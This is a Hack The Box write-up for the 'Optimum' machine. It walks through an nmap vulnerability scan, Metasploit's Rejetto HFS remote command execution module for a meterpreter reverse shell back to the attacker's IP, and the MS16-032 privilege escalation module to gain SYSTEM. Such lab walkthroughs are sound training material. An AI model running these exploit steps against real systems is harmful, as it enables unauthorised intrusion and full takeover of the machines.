Optimum

Write up for the HTB machine 'Optimum'

1. Inital recon

1.1. nmap

nmap --script vuln 10.10.10.8

PORT   STATE SERVICE
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
| http-vuln-cve2011-3192: 
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  BID:49303  CVE:CVE-2011-3192
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://www.tenable.com/plugins/nessus/55976
|       https://www.securityfocus.com/bid/49303
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_      https://seclists.org/fulldisclosure/2011/Aug/175
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

1.2. website recon

even though nmap reveals some vulnerabilities, we're looking for remote code execution vulnerabilities, so let's visit the web application in the browser

we can see that it is running HttpFileServer 2.3

2. msfconsole

let's start by running search HttpFileServer 2.3 in msfconsole

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

let's use this exploit by running use 0

we need to set the options for the exploit

set rhost 10.10.10.8
set lhost YOUR_IP

and then exploit for our meterpreter shell

then we can find the user flag at C:\Users\kostas\Desktop

3. root.txt

let's try and find a vector to escalate our privileges. within our meterpreter shell run the command run post/multi/recon/local_exploit_suggester

and we can see exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. has potential

so let's use this exploit. put the current session in the background using ctrl+z, then run use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

set the options

set lhost YOUR_IP
set session SESSION_NUMBER

You can check the session number using sessions

finally, exploit to run the exploit. once we have a meterpreter shell we can run shell and then whoami to confirm that we are nt authority\system

the root flag can be found at C:\Users\Administrator\Desktop

PreviousOnlyForYouNextPC

Last updated